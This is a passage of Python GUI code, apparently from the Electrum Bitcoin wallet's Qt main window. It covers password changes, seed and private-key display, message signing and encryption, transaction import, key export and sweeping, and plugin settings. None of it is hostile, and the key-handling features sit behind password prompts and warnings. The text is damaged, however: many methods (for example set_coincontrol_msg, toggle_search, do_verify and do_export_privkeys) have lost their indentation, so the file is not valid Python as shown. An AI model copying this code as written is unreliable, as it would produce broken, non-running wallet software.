        # lightning / network buttons only exist when a network is available
        self.lightning_button = None
        if self.wallet.has_lightning() and self.network:
            self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
            self.update_lightning_icon()
            sb.addPermanentWidget(self.lightning_button)
        self.status_button = None
        if self.network:
            self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
            sb.addPermanentWidget(self.status_button)
        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)
    def create_coincontrol_statusbar(self):
        """Build the (initially hidden) coin-control status bar with its Reset button."""
        self.coincontrol_sb = sb = QStatusBar()
        sb.setSizeGripEnabled(False)
        #sb.setFixedHeight(3 * char_width_in_lineedit())
        sb.setStyleSheet('QStatusBar::item {border: None;} '
                         + ColorScheme.GREEN.as_stylesheet(True))
        self.coincontrol_label = QLabel()
        self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
        self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        sb.addWidget(self.coincontrol_label)
        # Reset clears the manual coin selection
        clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
        clear_cc_button.setStyleSheet("margin-right: 5px;")
        sb.addPermanentWidget(clear_cc_button)
        sb.setVisible(False)
        return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
    def update_lightning_icon(self):
        """Refresh the lightning status-bar button with gossip sync progress."""
        if self.lightning_button is None:
            return
        if self.network.lngossip is None:
            return
        # display colorful lightning icon to signal connection
        self.lightning_button.setIcon(read_QIcon("lightning.png"))
        cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
        # self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
        progress_str = "??%"
        if progress_percent is not None:
            progress_str = f"{progress_percent}%"
        if progress_percent and progress_percent >= 100:
            # fully synced: drop the percentage text
            self.lightning_button.setMaximumWidth(25)
            self.lightning_button.setText('')
            self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
        else:
            self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
            self.lightning_button.setText(progress_str)
            self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
                                               "Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
    def change_password_dialog(self):
        """Change (or set/unset) the wallet password.

        Hardware wallets with XPUB_PASSWORD storage encryption derive the
        storage key from the device instead of asking the user for passwords.
        """
        from electrum.storage import StorageEncryptionVersion
        if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
            from .password_dialog import ChangePasswordDialogForHW
            d = ChangePasswordDialogForHW(self, self.wallet)
            ok, encrypt_file = d.run()
            if not ok:
                return
            try:
                hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
            except UserCancelled:
                return
            except BaseException as e:
                self.logger.exception('')
                self.show_error(repr(e))
                return
            # the device-derived secret doubles as both old and new password
            old_password = hw_dev_pw if self.wallet.has_password() else None
            new_password = hw_dev_pw if encrypt_file else None
        else:
            from .password_dialog import ChangePasswordDialogForSW
            d = ChangePasswordDialogForSW(self, self.wallet)
            ok, old_password, new_password, encrypt_file = d.run()
            if not ok:
                return
        try:
            self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
        except InvalidPassword as e:
            self.show_error(str(e))
            return
        except BaseException:
            self.logger.exception('Failed to update password')
            self.show_error(_('Failed to update password'))
            return
        msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
        self.show_message(msg, title=_("Success"))
        self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
    def new_contact_dialog(self):
        """Prompt for an address + name and add them as a contact."""
        d = WindowModalDialog(self, _("New Contact"))
        vbox = QVBoxLayout(d)
        vbox.addWidget(QLabel(_('New Contact') + ':'))
        grid = QGridLayout()
        line1 = QLineEdit()
        line1.setFixedWidth(32 * char_width_in_lineedit())
        line2 = QLineEdit()
        line2.setFixedWidth(32 * char_width_in_lineedit())
        grid.addWidget(QLabel(_("Address")), 1, 0)
        grid.addWidget(line1, 1, 1)
        grid.addWidget(QLabel(_("Name")), 2, 0)
        grid.addWidget(line2, 2, 1)
        vbox.addLayout(grid)
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if d.exec_():
            # set_contact(label, address): line2 holds the name, line1 the address
            self.set_contact(line2.text(), line1.text())
    def show_wallet_info(self):
        """Show a modal dialog with wallet metadata: name, type, script type,
        seed availability, keystore(s) with master public keys, and lightning status."""
        dialog = WindowModalDialog(self, _("Wallet Information"))
        dialog.setMinimumSize(500, 100)
        vbox = QVBoxLayout()
        wallet_type = self.wallet.db.get('wallet_type', '')
        if self.wallet.is_watching_only():
            wallet_type += ' [{}]'.format(_('watching-only'))
        seed_available = _('True') if self.wallet.has_seed() else _('False')
        keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
        grid = QGridLayout()
        basename = os.path.basename(self.wallet.storage.path)
        grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
        grid.addWidget(QLabel(basename), 0, 1)
        grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
        grid.addWidget(QLabel(wallet_type), 1, 1)
        grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
        grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
        grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
        grid.addWidget(QLabel(str(seed_available)), 3, 1)
        if len(keystore_types) <= 1:
            grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
            ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
            grid.addWidget(QLabel(ks_type), 4, 1)
        # lightning
        grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
        if self.wallet.can_have_lightning():
            grid.addWidget(QLabel(_('Enabled')), 5, 1)
            local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
            local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
            grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
            grid.addWidget(local_nodeid, 6, 1, 1, 3)
        else:
            grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
            grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
        vbox.addLayout(grid)
        labels_clayout = None
        if self.wallet.is_deterministic():
            keystores = self.wallet.get_keystores()
            # one stacked page of xpub/derivation info per keystore
            ks_stack = QStackedWidget()
            def select_ks(index):
                ks_stack.setCurrentIndex(index)
            # only show the combobox in case multiple accounts are available
            if len(keystores) > 1:
                def label(idx, ks):
                    if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
                        return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
                    else:
                        return _("keystore") + f' {idx+1}'
                labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
                on_click = lambda clayout: select_ks(clayout.selected_index())
                labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
                vbox.addLayout(labels_clayout.layout())
            for ks in keystores:
                ks_w = QWidget()
                ks_vbox = QVBoxLayout()
                ks_vbox.setContentsMargins(0, 0, 0, 0)
                ks_w.setLayout(ks_vbox)
                mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
                mpk_text.setMaximumHeight(150)
                mpk_text.addCopyButton(self.app)
                run_hook('show_xpub_button', mpk_text, ks)
                der_path_hbox = QHBoxLayout()
                der_path_hbox.setContentsMargins(0, 0, 0, 0)
                der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
                der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
                der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
                der_path_hbox.addWidget(der_path_text)
                der_path_hbox.addStretch()
                ks_vbox.addWidget(QLabel(_("Master Public Key")))
                ks_vbox.addWidget(mpk_text)
                ks_vbox.addLayout(der_path_hbox)
                ks_stack.addWidget(ks_w)
            select_ks(0)
            vbox.addWidget(ks_stack)
        vbox.addStretch(1)
        btn_export_info = run_hook('wallet_info_buttons', self, dialog)
        btn_close = CloseButton(dialog)
        btns = Buttons(btn_export_info, btn_close)
        vbox.addLayout(btns)
        dialog.setLayout(vbox)
        dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
    @protected
    def _delete_wallet(self, password):
        """Delete the wallet file via the daemon and close this window.

        NOTE(review): @protected supplies *password* (prompting the user if needed).
        """
        wallet_path = self.wallet.storage.path
        basename = os.path.basename(wallet_path)
        r = self.gui_object.daemon.delete_wallet(wallet_path)
        self.close()
        if r:
            self.show_error(_("Wallet removed: {}").format(basename))
        else:
            self.show_error(_("Wallet file not found: {}").format(basename))
    @protected
    def show_seed_dialog(self, password):
        """Show the wallet seed (and passphrase, if any); requires the password."""
        if not self.wallet.has_seed():
            self.show_message(_('This wallet has no seed'))
            return
        keystore = self.wallet.get_keystore()
        try:
            seed = keystore.get_seed(password)
            passphrase = keystore.get_passphrase(password)
        except BaseException as e:
            self.show_error(repr(e))
            return
        from .seed_dialog import SeedDialog
        d = SeedDialog(self, seed, passphrase, config=self.config)
        d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
    @protected
    def show_private_key(self, address, password):
        """Show the private key (text + QR) for *address*; requires the password."""
        if not address:
            return
        try:
            pk = self.wallet.export_private_key(address, password)
        except Exception as e:
            self.logger.exception('')
            self.show_message(repr(e))
            return
        # first element of deserialize_privkey() is shown as the script type
        xtype = bitcoin.deserialize_privkey(pk)[0]
        d = WindowModalDialog(self, _("Private key"))
        d.setMinimumSize(600, 150)
        vbox = QVBoxLayout()
        vbox.addWidget(QLabel(_("Address") + ': ' + address))
        vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
        vbox.addWidget(QLabel(_("Private key") + ':'))
        keys_e = ShowQRTextEdit(text=pk, config=self.config)
        keys_e.addCopyButton(self.app)
        vbox.addWidget(keys_e)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.setLayout(vbox)
        d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
    @protected
    def do_sign(self, address, message, signature, password):
        """Sign *message* with *address*'s key; fills the signature widget asynchronously."""
        address = address.text().strip()
        message = message.toPlainText().strip()
        if not bitcoin.is_address(address):
            self.show_message(_('Invalid Bitcoin address.'))
            return
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        if not self.wallet.is_mine(address):
            self.show_message(_('Address not in wallet.'))
            return
        # only single-key address types can sign messages
        txin_type = self.wallet.get_txin_type(address)
        if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
            self.show_message(_('Cannot sign messages with this type of address:') + \
                              ' ' + txin_type + '\n\n' + self.msg_sign)
            return
        task = partial(self.wallet.sign_message, address, message, password)
        def show_signed_message(sig):
            try:
                signature.setText(base64.b64encode(sig).decode('ascii'))
            except RuntimeError:
                # (signature) wrapped C/C++ object has been deleted
                pass
        # run off the GUI thread via the wallet's worker thread
        self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
    def sign_verify_message(self, address=''):
        """Open the Sign/verify Message dialog, optionally prefilled with *address*."""
        d = WindowModalDialog(self, _('Sign/verify Message'))
        d.setMinimumSize(610, 290)
        layout = QGridLayout(d)
        message_e = QTextEdit()
        message_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Message')), 1, 0)
        layout.addWidget(message_e, 1, 1)
        layout.setRowStretch(2,3)
        address_e = QLineEdit()
        address_e.setText(address)
        layout.addWidget(QLabel(_('Address')), 2, 0)
        layout.addWidget(address_e, 2, 1)
        signature_e = QTextEdit()
        signature_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Signature')), 3, 0)
        layout.addWidget(signature_e, 3, 1)
        layout.setRowStretch(3,1)
        hbox = QHBoxLayout()
        b = QPushButton(_("Sign"))
        b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
        hbox.addWidget(b)
        b = QPushButton(_("Verify"))
        b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
        hbox.addWidget(b)
        b = QPushButton(_("Close"))
        b.clicked.connect(d.accept)
        hbox.addWidget(b)
        layout.addLayout(hbox, 4, 1)
        d.exec_()
    @protected
    def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
        """Decrypt the ciphertext field with the wallet key for the given pubkey (async)."""
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        cyphertext = encrypted_e.toPlainText()
        task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
        def setText(text):
            try:
                message_e.setText(text.decode('utf-8'))
            except RuntimeError:
                # (message_e) wrapped C/C++ object has been deleted
                pass
        # run off the GUI thread via the wallet's worker thread
        self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
    def encrypt_message(self, address=''):
        """Open the Encrypt/decrypt Message dialog; *address* prefills its public key."""
        d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
        d.setMinimumSize(610, 490)
        layout = QGridLayout(d)
        message_e = QTextEdit()
        message_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Message')), 1, 0)
        layout.addWidget(message_e, 1, 1)
        layout.setRowStretch(2,3)
        pubkey_e = QLineEdit()
        if address:
            pubkey = self.wallet.get_public_key(address)
            pubkey_e.setText(pubkey)
        layout.addWidget(QLabel(_('Public key')), 2, 0)
        layout.addWidget(pubkey_e, 2, 1)
        encrypted_e = QTextEdit()
        encrypted_e.setAcceptRichText(False)
        layout.addWidget(QLabel(_('Encrypted')), 3, 0)
        layout.addWidget(encrypted_e, 3, 1)
        layout.setRowStretch(3,1)
        hbox = QHBoxLayout()
        b = QPushButton(_("Encrypt"))
        b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
        hbox.addWidget(b)
        b = QPushButton(_("Decrypt"))
        b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
        hbox.addWidget(b)
        b = QPushButton(_("Close"))
        b.clicked.connect(d.accept)
        hbox.addWidget(b)
        layout.addLayout(hbox, 4, 1)
        d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
    def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
        """Parse a transaction from raw/PSBT text; show an error and return None on failure."""
        from electrum.transaction import tx_from_any
        try:
            return tx_from_any(data)
        except BaseException as e:
            self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
            return
    def import_channel_backup(self, encrypted: str):
        """Import an encrypted lightning channel backup after user confirmation."""
        if not self.question('Import channel backup?'):
            return
        try:
            self.wallet.lnbackups.import_channel_backup(encrypted)
        except Exception as e:
            self.show_error("failed to import backup" + '\n' + str(e))
            return
    def read_tx_from_qrcode(self):
        """Scan a QR code and dispatch: BIP21 URI, channel backup, or raw transaction."""
        from electrum import qrscanner
        try:
            data = qrscanner.scan_barcode(self.config.get_video_device())
        except BaseException as e:
            self.show_error(repr(e))
            return
        if not data:
            return
        # if the user scanned a bitcoin URI
        if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
            self.pay_to_URI(data)
            return
        if data.lower().startswith('channel_backup:'):
            self.import_channel_backup(data)
            return
        # else if the user scanned an offline signed tx
        tx = self.tx_from_text(data)
        if not tx:
            return
        self.show_transaction(tx)
    def read_tx_from_file(self) -> Optional[Transaction]:
        """Let the user pick a transaction file and parse it; None on cancel/failure."""
        fileName = getOpenFileName(
            parent=self,
            title=_("Select your transaction file"),
            filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
            config=self.config,
        )
        if not fileName:
            return
        try:
            # binary read: the content may be raw bytes (PSBT) or text (hex)
            with open(fileName, "rb") as f:
                file_content = f.read()  # type: Union[str, bytes]
        except (ValueError, IOError, os.error) as reason:
            self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
                               title=_("Unable to read file or no transaction found"))
            return
        return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
    def do_process_from_txid(self):
        """Prompt for a txid, fetch the transaction from the network, and show it."""
        from electrum import transaction
        txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
        if ok and txid:
            txid = str(txid).strip()
            try:
                # blocking fetch, run on the network's event loop
                raw_tx = self.network.run_from_another_thread(
                    self.network.get_transaction(txid, timeout=10))
            except UntrustedServerReturnedError as e:
                self.logger.info(f"Error getting transaction from network: {repr(e)}")
                self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
                return
            except Exception as e:
                self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
                return
            else:
                tx = transaction.Transaction(raw_tx)
                self.show_transaction(tx)
    @protected
    def export_privkeys_dialog(self, password):
        """Export all wallet private keys to a CSV/JSON file.

        Keys are derived on a background thread; progress and completion are
        reported back to the dialog through Qt signals.
        """
        if self.wallet.is_watching_only():
            self.show_message(_("This is a watching-only wallet"))
            return
        if isinstance(self.wallet, Multisig_Wallet):
            self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                              _('It cannot be "backed up" by simply exporting these private keys.'))
        d = WindowModalDialog(self, _('Private keys'))
        d.setMinimumSize(980, 300)
        vbox = QVBoxLayout(d)
        msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                              _("Exposing a single private key can compromise your entire wallet!"),
                              _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
        vbox.addWidget(QLabel(msg))
        e = QTextEdit()
        e.setReadOnly(True)
        vbox.addWidget(e)
        defaultname = 'electrum-private-keys.csv'
        select_msg = _('Select file to export your private keys to')
        hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
        vbox.addLayout(hbox)
        b = OkButton(d, _('Export'))
        b.setEnabled(False)
        vbox.addLayout(Buttons(CancelButton(d), b))
        private_keys = {}
        addresses = self.wallet.get_addresses()
        done = False
        cancelled = False
        def privkeys_thread():
            # background worker: derive one key at a time, signalling progress
            for addr in addresses:
                time.sleep(0.1)
                if done or cancelled:
                    break
                privkey = self.wallet.export_private_key(addr, password)
                private_keys[addr] = privkey
                self.computing_privkeys_signal.emit()
            if not cancelled:
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.emit()
        def show_privkeys():
            s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
            e.setText(s)
            b.setEnabled(True)
            self.show_privkeys_signal.disconnect()
            nonlocal done
            done = True
        def on_dialog_closed(*args):
            # stop the worker and detach signals if the user closes early
            nonlocal done
            nonlocal cancelled
            if not done:
                cancelled = True
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.disconnect()
        self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
        self.show_privkeys_signal.connect(show_privkeys)
        d.finished.connect(on_dialog_closed)
        threading.Thread(target=privkeys_thread).start()
        if not d.exec_():
            done = True
            return
        filename = filename_e.text()
        if not filename:
            return
        try:
            self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
        except (IOError, os.error) as reason:
            txt = "\n".join([
                _("Electrum was unable to produce a private key-export."),
                str(reason)
            ])
            self.show_critical(txt, title=_("Unable to create csv"))
        except Exception as e:
            self.show_message(repr(e))
            return
        self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
    def do_export_labels(self):
        """Export wallet labels to a user-chosen file."""
        export_meta_gui(self, _('labels'), self.wallet.export_labels)
    def import_invoices(self):
        """Import invoices from a user-chosen file and refresh the invoice list."""
        import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
    def export_invoices(self):
        """Export invoices to a user-chosen file."""
        export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
    def import_requests(self):
        """Import payment requests from a user-chosen file and refresh the request list."""
        import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
    def export_requests(self):
        """Export payment requests to a user-chosen file."""
        export_meta_gui(self, _('requests'), self.wallet.export_requests)
    def import_contacts(self):
        """Import contacts from a user-chosen file and refresh the contact list."""
        import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
    def export_contacts(self):
        """Export contacts to a user-chosen file."""
        export_meta_gui(self, _('contacts'), self.contacts.export_file)
    def sweep_key_dialog(self):
        """Sweep external private keys into a wallet address.

        Collects WIF keys + a destination address, validates both live, then
        prepares and opens the send dialog for a sweep-all transaction.
        """
        d = WindowModalDialog(self, title=_('Sweep private keys'))
        d.setMinimumSize(600, 300)
        vbox = QVBoxLayout(d)
        hbox_top = QHBoxLayout()
        hbox_top.addWidget(QLabel(_("Enter private keys:")))
        hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        vbox.addLayout(hbox_top)
        keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
        keys_e.setTabChangesFocus(True)
        vbox.addWidget(keys_e)
        # prefer unused addresses as the sweep destination
        addresses = self.wallet.get_unused_addresses()
        if not addresses:
            try:
                addresses = self.wallet.get_receiving_addresses()
            except AttributeError:
                addresses = self.wallet.get_addresses()
        h, address_e = address_field(addresses)
        vbox.addLayout(h)
        vbox.addStretch(1)
        button = OkButton(d, _('Sweep'))
        vbox.addLayout(Buttons(CancelButton(d), button))
        button.setEnabled(False)
        def get_address():
            # returns the destination address, or None if invalid
            addr = str(address_e.text()).strip()
            if bitcoin.is_address(addr):
                return addr
        def get_pk(*, raise_on_error=False):
            text = str(keys_e.toPlainText())
            return keystore.get_private_keys(text, raise_on_error=raise_on_error)
        def on_edit():
            # enable Sweep only when both keys and address validate
            valid_privkeys = False
            try:
                valid_privkeys = get_pk(raise_on_error=True) is not None
            except Exception as e:
                button.setToolTip(f'{_("Error")}: {repr(e)}')
            else:
                button.setToolTip('')
            button.setEnabled(get_address() is not None and valid_privkeys)
        on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
        keys_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_edit)
        address_e.textChanged.connect(on_address)
        on_address(str(address_e.text()))
        if not d.exec_():
            return
        # user pressed "sweep"
        addr = get_address()
        try:
            self.wallet.check_address_for_corruption(addr)
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            raise
        privkeys = get_pk()
        def on_success(result):
            coins, keypairs = result
            # '!' value = spend the maximum (sweep everything)
            outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
            self.warn_if_watching_only()
            self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
        def on_failure(exc_info):
            self.on_error(exc_info)
        msg = _('Preparing sweep transaction...')
        task = lambda: self.network.run_from_another_thread(
            sweep_preparations(privkeys, self.network))
        WaitingDialog(self, msg, task, on_success, on_failure)
    def _do_import(self, title, header_layout, func):
        """Generic import helper: prompt for multi-line text, pass the
        whitespace-separated tokens to *func*, and report good/bad inputs
        (at most 10 of each shown)."""
        text = text_dialog(
            parent=self,
            title=title,
            header_layout=header_layout,
            ok_label=_('Import'),
            allow_multi=True,
            config=self.config,
        )
        if not text:
            return
        keys = str(text).split()
        good_inputs, bad_inputs = func(keys)
        if good_inputs:
            msg = '\n'.join(good_inputs[:10])
            if len(good_inputs) > 10: msg += '\n...'
            self.show_message(_("The following addresses were added")
                              + f' ({len(good_inputs)}):\n' + msg)
        if bad_inputs:
            msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
            if len(bad_inputs) > 10: msg += '\n...'
            self.show_error(_("The following inputs could not be imported")
                            + f' ({len(bad_inputs)}):\n' + msg)
        self.address_list.update()
        self.history_list.update()
    def import_addresses(self):
        """Import watch-only addresses, for wallet types that support it."""
        if not self.wallet.can_import_address():
            return
        title, msg = _('Import addresses'), _("Enter addresses")+':'
        self._do_import(title, msg, self.wallet.import_addresses)
    @protected
    def do_import_privkey(self, password):
        """Import WIF private keys; password is supplied by @protected."""
        if not self.wallet.can_import_privkey():
            return
        title = _('Import private keys')
        header_layout = QHBoxLayout()
        header_layout.addWidget(QLabel(_("Enter private keys")+':'))
        header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
    def update_fiat(self):
        """Show/hide fiat amount fields per exchange-rate state and refresh views."""
        b = self.fx and self.fx.is_enabled()
        self.fiat_send_e.setVisible(b)
        self.fiat_receive_e.setVisible(b)
        self.history_list.update()
        self.address_list.refresh_headers()
        self.address_list.update()
        self.update_status()
    def settings_dialog(self):
        """Open the modal settings dialog; propagate fx/plugin changes afterwards."""
        from .settings_dialog import SettingsDialog
        d = SettingsDialog(self, self.config)
        self.alias_received_signal.connect(d.set_alias_color)
        d.exec_()
        self.alias_received_signal.disconnect(d.set_alias_color)
        if self.fx:
            # fiat currency/provider may have changed
            self.fx.trigger_update()
        run_hook('close_settings_dialog')
        if d.need_restart:
            self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
    def closeEvent(self, event):
        """Qt close handler; guards against running cleanup twice."""
        # It seems in some rare cases this closeEvent() is called twice
        if not self.cleaned_up:
            self.cleaned_up = True
            self.clean_up()
        event.accept()
    def clean_up(self):
        """Persist window state and detach from global objects (called once, from closeEvent)."""
        self.wallet.thread.stop()
        util.unregister_callback(self.on_network)
        self.config.set_key("is_maximized", self.isMaximized())
        if not self.isMaximized():
            # remember the un-maximized geometry so the next open restores it
            g = self.geometry()
            self.wallet.db.put("winpos-qt", [g.left(),g.top(),
                                             g.width(),g.height()])
        self.wallet.db.put("qt-console-history", self.console.history[-50:])
        if self.qr_window:
            self.qr_window.close()
        self.close_wallet()
        self.gui_object.timer.timeout.disconnect(self.timer_actions)
        self.gui_object.close_window(self)
    def plugins_dialog(self):
        """Modal dialog listing plugins with enable checkboxes, per-plugin
        settings widgets, and help buttons."""
        self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
        plugins = self.gui_object.plugins
        vbox = QVBoxLayout(d)
        # plugins
        scroll = QScrollArea()
        scroll.setEnabled(True)
        scroll.setWidgetResizable(True)
        scroll.setMinimumSize(400,250)
        vbox.addWidget(scroll)
        w = QWidget()
        scroll.setWidget(w)
        w.setMinimumHeight(plugins.count() * 35)
        grid = QGridLayout()
        grid.setColumnStretch(0,1)
        w.setLayout(grid)
        settings_widgets = {}
        def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
            # keep row i's settings column in sync with the plugin's state
            widget = settings_widgets.get(name)  # type: Optional[QWidget]
            if widget and not p:
                # plugin got disabled, rm widget
                grid.removeWidget(widget)
                widget.setParent(None)
                settings_widgets.pop(name)
            elif widget is None and p and p.requires_settings() and p.is_enabled():
                # plugin got enabled, add widget
                widget = settings_widgets[name] = p.settings_widget(d)
                grid.addWidget(widget, i, 1)
